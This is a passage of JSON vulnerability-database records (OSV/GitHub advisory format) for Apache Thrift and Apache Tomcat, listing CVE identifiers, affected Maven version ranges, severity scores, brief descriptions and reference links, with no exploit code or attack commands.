"https://lists.apache.org/thread.html/rf359e5cc6a185494fc0cfe837fe82f7db2ef49242d35cbf3895aebce@%3Cdev.thrift.apache.org%3E" }, { "type": "WEB", "url": "https://security.gentoo.org/glsa/202107-32" }, { "type": "WEB", "url": "https://www.oracle.com//security-alerts/cpujul2021.html" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0804" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0805" 
}, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0806" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0811" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/003ac686189e6ce7b99267784d04bf60059a8c323eeda5a79a0309b8@%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/07bd68ad237a5d513751d6d2731a8828f902c738ea57d85c1a72bad3@%3Cdev.thrift.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/0d058e1bfd11727c4f2e2adf4b6e403a47c38e22431ab20066a1ac79@%3Cdev.thrift.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/1193444c17f499f92cd198d464a2c1ffc92182c83487345a854914b3@%3Cuser.thrift.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/1c18ec6ebfea0a9211992be952e8b33d0fda202c077979b84a5e09a8@%3Cuser.thrift.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/3dfa054b89274c9109c26ed1843ca15a14c03786f4016d26773878ae@%3Cdev.thrift.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/928cae83d20d8d8196c26118f7084aa37573e1d31162381fb9454fb5@%3Cdev.thrift.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/9f7150d0b02e72d1154721a412e80cf797f1b7cfa295fcefc67b1381@%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/a9669756befaeb0f8e08766d3f4d410a0fce85da3a570506f71f0b67@%3Cdev.thrift.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r0c606d4be9aa163d132edf8edd8eb55e7b9464063b99acbbf6e9e287@%3Cissues.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r0d08f5576286f4a042aabde13ecf58979644f6dc210f25aa9a4d469b@%3Cdev.thrift.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r137753c9df8dd9065bea27a26af49aadc406b5a57fc584fefa008afd@%3Cdev.thrift.apache.org%3E" }, { "type": 
"WEB", "url": "https://lists.apache.org/thread.html/r1b1a92c229ead94d53b3bcde9e624d002b54f1c6fdb830b9f4da20e1@%3Cdev.thrift.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r228ac842260c2c516af7b09f3cf4cf76e5b9c002e359954a203ab5a5@%3Cdev.thrift.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2832722c31d78bef7526e2c701ba4b046736e4c851473194a247392f@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r36581cc7047f007dd6aadbdd34e18545ec2c1eb7ccdae6dd47a877a9@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3887b48b183b6fa43e59398bd170a99239c0a16264cb5175b5b689d0@%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "http://mail-archives.apache.org/mod_mbox/thrift-dev/201910.mbox/%3CVI1PR0101MB2142E0EA19F582429C3AEBCBB1920%40VI1PR0101MB2142.eurprd01.prod.exchangelabs.com%3E" } ], "database_specific": { "cwe_ids": [ "CWE-835" ], "github_reviewed": true, "github_reviewed_at": "2022-06-27T16:12:09Z", "nvd_published_at": "2019-10-29T19:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-vx85-mj8c-4qm6", "published": "2019-01-17T13:56:33Z", "modified": "2024-02-16T08:22:18.795904Z", "aliases": [ "CVE-2018-11798" ], "related": [ "CGA-pmq8-4h9g-36mm" ], "summary": "Apache Thrift Node.js static web server sandbox escape", "details": "The Apache Thrift Node.js static web server in versions 0.9.2 through 0.11.0 have been determined to contain a security vulnerability in which a remote user has the ability to access files outside the set webservers docroot path.", "affected": [ { "package": { "name": "org.apache.thrift:libthrift", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.thrift/libthrift" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0.9.2" }, { "fixed": "0.12.0" } ] 
} ], "versions": [ "0.10.0", "0.11.0", "0.9.2", "0.9.3", "0.9.3-1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/01/GHSA-vx85-mj8c-4qm6/GHSA-vx85-mj8c-4qm6.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-11798" }, { "type": "WEB", "url": "https://github.com/apache/thrift/pull/1606" }, { "type": "WEB", "url": "https://github.com/apache/thrift/commit/2a2b72f6c8aef200ecee4984f011e06052288ff2" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:1545" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3140" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-vx85-mj8c-4qm6" }, { "type": "WEB", "url": "https://issues.apache.org/jira/browse/THRIFT-4647" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/6e9edd282684896cedf615fb67a02bebfe6007f2d5baf03ba52e34fd@%3Cuser.thrift.apache.org%3E" }, { "type": "WEB", "url": "https://web.archive.org/web/20200227094236/http://www.securityfocus.com/bid/106501" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html" } ], "database_specific": { "cwe_ids": [ "CWE-538" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:58:46Z", "nvd_published_at": null, "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-wjxj-f8rg-99wx", "published": "2019-01-17T13:56:40Z", "modified": "2024-03-14T05:20:15.449375Z", "aliases": [ "CVE-2018-1320" ], "related": [ "CGA-w2gp-wc62-wqxq" ], "summary": "Improper Input Validation in Apache Thrift", "details": "Apache Thrift Java client library versions 0.5.0 prior to 0.9.3-1 and 0.10.0 prior to 0.12.0 can bypass SASL negotiation isComplete validation in the org.apache.thrift.transport.TSaslTransport class. 
An assert used to determine if the SASL handshake had successfully completed could be disabled in production settings making the validation incomplete.", "affected": [ { "package": { "name": "org.apache.thrift:libthrift", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.thrift/libthrift" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0.5.0" }, { "fixed": "0.9.3-1" } ] } ], "versions": [ "0.6.1", "0.7.0", "0.8.0", "0.9.0", "0.9.1", "0.9.2", "0.9.3" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/01/GHSA-wjxj-f8rg-99wx/GHSA-wjxj-f8rg-99wx.json" } }, { "package": { "name": "org.apache.thrift:libthrift", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.thrift/libthrift" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0.10.0" }, { "fixed": "0.12.0" } ] } ], "versions": [ "0.10.0", "0.11.0" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/01/GHSA-wjxj-f8rg-99wx/GHSA-wjxj-f8rg-99wx.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1320" }, { "type": "WEB", "url": "https://github.com/apache/thrift/commit/7489ed6ac8bad64e72fa83ec9d53e1eeddca6c23" }, { "type": "WEB", "url": "https://github.com/apache/thrift/commit/d973409661f820d80d72c0034d06a12348c8705e" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2020.html" }, { "type": "WEB", "url": "https://web.archive.org/web/20200227094237/http://www.securityfocus.com/bid/106551" }, { "type": "WEB", "url": "https://support.f5.com/csp/article/K36361684" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2019/02/msg00008.html" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/r4d3f1d3e333d9c2b2f6e6ae8ed8750d4de03410ac294bcd12c7eefa3@%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3d71a6dbb063aa61ba81278fe622b20bfe7501bb3821c27695641ac3@%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r261972a3b14cf6f1dcd94b1b265e9ef644a38ccdf0d0238fa0c4d459@%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2278846f7ab06ec07a0aa31457235e0ded9191b216cba55f3f315f16@%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1015eaadef8314daa9348aa423086a732cfeb998ceb5d42605c9b0b5@%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r09c3dcdccf4b74ad13bda79b354e6b793255ccfe245cca1b8cee23f5@%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc@%3Cissues.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/e825ff2f4e129c0ecdb6a19030b53c1ccdf810a8980667628d0c6a80@%3Cannounce.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/dfee89880c84874058c6a584d8128468f8d3c2ac25068ded91073adc@%3Cuser.storm.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/dbe3a39b48900318ad44494e8721f786901ba4520cd412c7698f534f@%3Cdev.storm.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/da5234b5e78f1c99190407f791dfe1bf6c58de8d30d15974a9669be3@%3Cuser.thrift.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/8be5b16c02567fff61b1284e5df433a4e38617bc7de4804402bf62be@%3Ccommits.cassandra.apache.org%3E" }, { 
"type": "WEB", "url": "https://lists.apache.org/thread.html/6b07f6f618155c777191b4fad8ade0f0cf4ed4c12a1a746ce903d816@%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/3d3b6849fcf4cd1e87703b3dde0d57aabeb9ba0193dc0cf3c97f545d@%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/187684ac8b94d55256253f5220cb55e8bd568afdf9a8a86e9bbb66c9@%3Cdevnull.infra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/07c3cd5a2953a4b253eee4437b1397b1603d0f886437e19b657d2c54@%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://issues.apache.org/jira/browse/THRIFT-4506" }, { "type": "WEB", "url": "https://github.com/apache/thrift/releases/tag/0.9.3.1" }, { "type": "PACKAGE", "url": "https://github.com/apache/thrift" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:2413" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2019/07/24/3" }, { "type": "WEB", "url": "http://www.securityfocus.com/bid/106551" } ], "database_specific": { "cwe_ids": [ "CWE-20", "CWE-295" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T22:00:45Z", "nvd_published_at": "2019-01-07T17:29:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-27hp-xhwr-wr2m", "published": "2024-12-20T18:31:32Z", "modified": "2025-11-03T23:18:11.427349Z", "aliases": [ "BIT-tomcat-2024-56337", "CVE-2024-56337" ], "related": [ "CGA-6qvq-rhpg-rc66", "CGA-9w54-vfw9-4r27" ], "summary": "Apache Tomcat Time-of-check Time-of-use (TOCTOU) Race Condition vulnerability", "details": "Time-of-check Time-of-use (TOCTOU) Race Condition vulnerability in Apache Tomcat.\n\nThis issue affects 
Apache Tomcat: from 11.0.0-M1 through 11.0.1, from 10.1.0-M1 through 10.1.33, from 9.0.0.M1 through 9.0.97.\n\nThe mitigation for CVE-2024-50379 was incomplete.\n\nUsers running Tomcat on a case insensitive file system with the default servlet write enabled (readonly initialisation \nparameter set to the non-default value of false) may need additional configuration to fully mitigate CVE-2024-50379 depending on which version of Java they are using with Tomcat:\n- running on Java 8 or Java 11: the system property sun.io.useCanonCaches must be explicitly set to false (it defaults to true)\n- running on Java 17: the system property sun.io.useCanonCaches, if set, must be set to false (it defaults to false)\n- running on Java 21 onwards: no further configuration is required (the system property and the problematic cache have been removed)\n\nTomcat 11.0.3, 10.1.35 and 9.0.99 onwards will include checks that sun.io.useCanonCaches is set appropriately before allowing the default servlet to be write enabled on a case insensitive file system. 
Tomcat will also set sun.io.useCanonCaches to false by default where it can.", "affected": [ { "package": { "name": "org.apache.tomcat:tomcat-catalina", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-catalina" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "11.0.0-M1" }, { "fixed": "11.0.2" } ] } ], "versions": [ "11.0.0", "11.0.0-M1", "11.0.0-M10", "11.0.0-M11", "11.0.0-M12", "11.0.0-M13", "11.0.0-M14", "11.0.0-M15", "11.0.0-M16", "11.0.0-M17", "11.0.0-M18", "11.0.0-M19", "11.0.0-M20", "11.0.0-M21", "11.0.0-M22", "11.0.0-M24", "11.0.0-M25", "11.0.0-M26", "11.0.0-M3", "11.0.0-M4", "11.0.0-M5", "11.0.0-M6", "11.0.0-M7", "11.0.0-M9", "11.0.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/12/GHSA-27hp-xhwr-wr2m/GHSA-27hp-xhwr-wr2m.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-catalina", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-catalina" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.1.0-M1" }, { "fixed": "10.1.34" } ] } ], "versions": [ "10.1.0", "10.1.0-M1", "10.1.0-M10", "10.1.0-M11", "10.1.0-M12", "10.1.0-M14", "10.1.0-M15", "10.1.0-M16", "10.1.0-M17", "10.1.0-M2", "10.1.0-M4", "10.1.0-M5", "10.1.0-M6", "10.1.0-M7", "10.1.0-M8", "10.1.1", "10.1.10", "10.1.11", "10.1.12", "10.1.13", "10.1.14", "10.1.15", "10.1.16", "10.1.17", "10.1.18", "10.1.19", "10.1.2", "10.1.20", "10.1.23", "10.1.24", "10.1.25", "10.1.26", "10.1.28", "10.1.29", "10.1.30", "10.1.31", "10.1.33", "10.1.4", "10.1.5", "10.1.6", "10.1.7", "10.1.8", "10.1.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/12/GHSA-27hp-xhwr-wr2m/GHSA-27hp-xhwr-wr2m.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { 
"introduced": "9.0.0.M1" }, { "fixed": "9.0.98" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/12/GHSA-27hp-xhwr-wr2m/GHSA-27hp-xhwr-wr2m.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "11.0.0-M1" }, { "fixed": "11.0.2" } ] } ], "versions": [ "11.0.0", "11.0.0-M1", "11.0.0-M10", "11.0.0-M11", "11.0.0-M12", "11.0.0-M13", "11.0.0-M14", "11.0.0-M15", "11.0.0-M16", "11.0.0-M17", "11.0.0-M18", "11.0.0-M19", "11.0.0-M20", "11.0.0-M21", "11.0.0-M22", "11.0.0-M24", "11.0.0-M25", "11.0.0-M26", "11.0.0-M3", "11.0.0-M4", "11.0.0-M5", "11.0.0-M6", "11.0.0-M7", "11.0.0-M9", "11.0.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/12/GHSA-27hp-xhwr-wr2m/GHSA-27hp-xhwr-wr2m.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.1.0-M1" }, { "fixed": "10.1.34" } ] } ], "versions": [ "10.1.0", "10.1.0-M1", "10.1.0-M10", "10.1.0-M11", "10.1.0-M12", "10.1.0-M14", "10.1.0-M15", "10.1.0-M16", "10.1.0-M17", "10.1.0-M2", "10.1.0-M4", "10.1.0-M5", "10.1.0-M6", "10.1.0-M7", "10.1.0-M8", "10.1.1", "10.1.10", "10.1.11", "10.1.12", "10.1.13", "10.1.14", "10.1.15", "10.1.16", "10.1.17", "10.1.18", "10.1.19", "10.1.2", "10.1.20", "10.1.23", "10.1.24", "10.1.25", "10.1.26", "10.1.28", "10.1.29", "10.1.30", "10.1.31", "10.1.33", "10.1.4", "10.1.5", "10.1.6", "10.1.7", "10.1.8", "10.1.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/12/GHSA-27hp-xhwr-wr2m/GHSA-27hp-xhwr-wr2m.json" } }, { "package": { "name": 
"org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.0.M1" }, { "fixed": "9.0.98" } ] } ], "versions": [ "9.0.0.M1", "9.0.0.M10", "9.0.0.M11", "9.0.0.M13", "9.0.0.M15", "9.0.0.M17", "9.0.0.M18", "9.0.0.M19", "9.0.0.M20", "9.0.0.M21", "9.0.0.M22", "9.0.0.M25", "9.0.0.M26", "9.0.0.M27", "9.0.0.M3", "9.0.0.M4", "9.0.0.M6", "9.0.0.M8", "9.0.0.M9", "9.0.1", "9.0.10", "9.0.11", "9.0.12", "9.0.13", "9.0.14", "9.0.16", "9.0.17", "9.0.19", "9.0.2", "9.0.20", "9.0.21", "9.0.22", "9.0.24", "9.0.26", "9.0.27", "9.0.29", "9.0.30", "9.0.31", "9.0.33", "9.0.34", "9.0.35", "9.0.36", "9.0.37", "9.0.38", "9.0.39", "9.0.4", "9.0.40", "9.0.41", "9.0.43", "9.0.44", "9.0.45", "9.0.46", "9.0.48", "9.0.5", "9.0.50", "9.0.52", "9.0.53", "9.0.54", "9.0.55", "9.0.56", "9.0.58", "9.0.59", "9.0.6", "9.0.60", "9.0.62", "9.0.63", "9.0.64", "9.0.65", "9.0.67", "9.0.68", "9.0.69", "9.0.7", "9.0.70", "9.0.71", "9.0.72", "9.0.73", "9.0.74", "9.0.75", "9.0.76", "9.0.78", "9.0.79", "9.0.8", "9.0.80", "9.0.81", "9.0.82", "9.0.83", "9.0.84", "9.0.85", "9.0.86", "9.0.87", "9.0.88", "9.0.89", "9.0.90", "9.0.91", "9.0.93", "9.0.94", "9.0.95", "9.0.96", "9.0.97" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/12/GHSA-27hp-xhwr-wr2m/GHSA-27hp-xhwr-wr2m.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-56337" }, { "type": "PACKAGE", "url": "https://github.com/apache/tomcat" }, { "type": "WEB", "url": "https://lists.apache.org/thread/b2b9qrgjrz1kvo4ym8y2wkfdvwoq6qbp" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00009.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20250103-0002" }, { "type": "WEB", "url": 
"https://tomcat.apache.org/security-10.html#Fixed_in_Apache_Tomcat_10.1.34" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-11.html#Fixed_in_Apache_Tomcat_11.0.2" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-9.html#Fixed_in_Apache_Tomcat_9.0.98" }, { "type": "WEB", "url": "https://www.cve.org/CVERecord?id=CVE-2024-50379" } ], "database_specific": { "cwe_ids": [ "CWE-367" ], "github_reviewed": true, "github_reviewed_at": "2024-12-20T19:50:45Z", "nvd_published_at": "2024-12-20T16:15:24Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:U" } ] }, { "schema_version": "1.7.3", "id": "GHSA-2rvv-w9r2-rg7m", "published": "2021-05-13T22:30:02Z", "modified": "2024-03-11T16:46:40.808422Z", "aliases": [ "BIT-tomcat-2021-24122", "CVE-2021-24122" ], "related": [ "CGA-9cx5-82vv-8fp2" ], "summary": "Information Disclosure in Apache Tomcat", "details": "When serving resources from a network location using the NTFS file system, Apache Tomcat versions 10.0.0-M1 to 10.0.0-M9, 9.0.0.M1 to 9.0.39, 8.5.0 to 8.5.59 and 7.0.0 to 7.0.106 were susceptible to JSP source code disclosure in some configurations. 
The root cause was the unexpected behaviour of the JRE API File.getCanonicalPath() which in turn was caused by the inconsistent behaviour of the Windows API (FindFirstFileW) in some circumstances.", "affected": [ { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.0.0-M1" }, { "fixed": "10.0.0-M10" } ] } ], "versions": [ "10.0.0-M1", "10.0.0-M3", "10.0.0-M4", "10.0.0-M5", "10.0.0-M6", "10.0.0-M7", "10.0.0-M8", "10.0.0-M9" ], "database_specific": { "last_known_affected_version_range": "\u003c= 10.0.0-M9", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/05/GHSA-2rvv-w9r2-rg7m/GHSA-2rvv-w9r2-rg7m.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.0" }, { "fixed": "9.0.40" } ] } ], "versions": [ "9.0.1", "9.0.10", "9.0.11", "9.0.12", "9.0.13", "9.0.14", "9.0.16", "9.0.17", "9.0.19", "9.0.2", "9.0.20", "9.0.21", "9.0.22", "9.0.24", "9.0.26", "9.0.27", "9.0.29", "9.0.30", "9.0.31", "9.0.33", "9.0.34", "9.0.35", "9.0.36", "9.0.37", "9.0.38", "9.0.39", "9.0.4", "9.0.5", "9.0.6", "9.0.7", "9.0.8" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/05/GHSA-2rvv-w9r2-rg7m/GHSA-2rvv-w9r2-rg7m.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.5.0" }, { "fixed": "8.5.60" } ] } ], "versions": [ "8.5.0", "8.5.11", "8.5.12", "8.5.13", "8.5.14", "8.5.15", "8.5.16", "8.5.19", "8.5.2", "8.5.20", "8.5.21", "8.5.23", "8.5.24", "8.5.27", 
"8.5.28", "8.5.29", "8.5.3", "8.5.30", "8.5.31", "8.5.32", "8.5.33", "8.5.34", "8.5.35", "8.5.37", "8.5.38", "8.5.39", "8.5.4", "8.5.40", "8.5.41", "8.5.42", "8.5.43", "8.5.45", "8.5.46", "8.5.47", "8.5.49", "8.5.5", "8.5.50", "8.5.51", "8.5.53", "8.5.54", "8.5.55", "8.5.56", "8.5.57", "8.5.58", "8.5.59", "8.5.6", "8.5.8", "8.5.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/05/GHSA-2rvv-w9r2-rg7m/GHSA-2rvv-w9r2-rg7m.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "7.0.0" }, { "fixed": "7.0.107" } ] } ], "versions": [ "7.0.0", "7.0.100", "7.0.103", "7.0.104", "7.0.105", "7.0.106", "7.0.11", "7.0.12", "7.0.14", "7.0.16", "7.0.19", "7.0.2", "7.0.20", "7.0.21", "7.0.22", "7.0.23", "7.0.25", "7.0.26", "7.0.27", "7.0.28", "7.0.29", "7.0.30", "7.0.32", "7.0.33", "7.0.34", "7.0.35", "7.0.37", "7.0.39", "7.0.4", "7.0.40", "7.0.41", "7.0.42", "7.0.47", "7.0.5", "7.0.50", "7.0.52", "7.0.53", "7.0.54", "7.0.55", "7.0.56", "7.0.57", "7.0.59", "7.0.6", "7.0.61", "7.0.62", "7.0.63", "7.0.64", "7.0.65", "7.0.67", "7.0.68", "7.0.69", "7.0.70", "7.0.72", "7.0.73", "7.0.75", "7.0.76", "7.0.77", "7.0.78", "7.0.79", "7.0.8", "7.0.81", "7.0.82", "7.0.84", "7.0.85", "7.0.86", "7.0.88", "7.0.90", "7.0.91", "7.0.92", "7.0.93", "7.0.94", "7.0.96", "7.0.99" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/05/GHSA-2rvv-w9r2-rg7m/GHSA-2rvv-w9r2-rg7m.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-24122" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/7f004ac4531c45f9a2a2d1470561fe135cf27bc2" }, { "type": "WEB", "url": 
"https://github.com/apache/tomcat/commit/800b03140e640f8892f27021e681645e8e320177" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/920dddbdb981f92e8d5872a4bb126a10af5ca8a9" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/935fc5582dc25ae10bab6f9d5629ff8d996cb533" }, { "type": "WEB", "url": "https://www.oracle.com//security-alerts/cpujul2021.html" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-9.html" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-8.html" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-7.html" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-10.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20210212-0008" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2021/03/msg00018.html" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rca833c6d42b7b9ce1563488c0929f29fcc95947d86e5e740258c8937@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb32a73b7cb919d4f44a2596b6b951274c0004fc8b0e393d6829a45f9@%3Cusers.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r7e0bb9ea415724550e2b325e143b23e269579e54d66fcd7754bd0c20@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r776c64337495bf28b7d5597268114a888e3fad6045c40a0da0c66d4d@%3Cdev.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r7382e1e35b9bc7c8f320b90ad77e74c13172d08034e20c18000fe710@%3Cdev.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1595889b083e05986f42b944dc43060d6b083022260b6ea64d2cec52@%3Cannounce.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1595889b083e05986f42b944dc43060d6b083022260b6ea64d2cec52@%3Cannounce.apache.org%3E" }, { "type": "WEB", "url": 
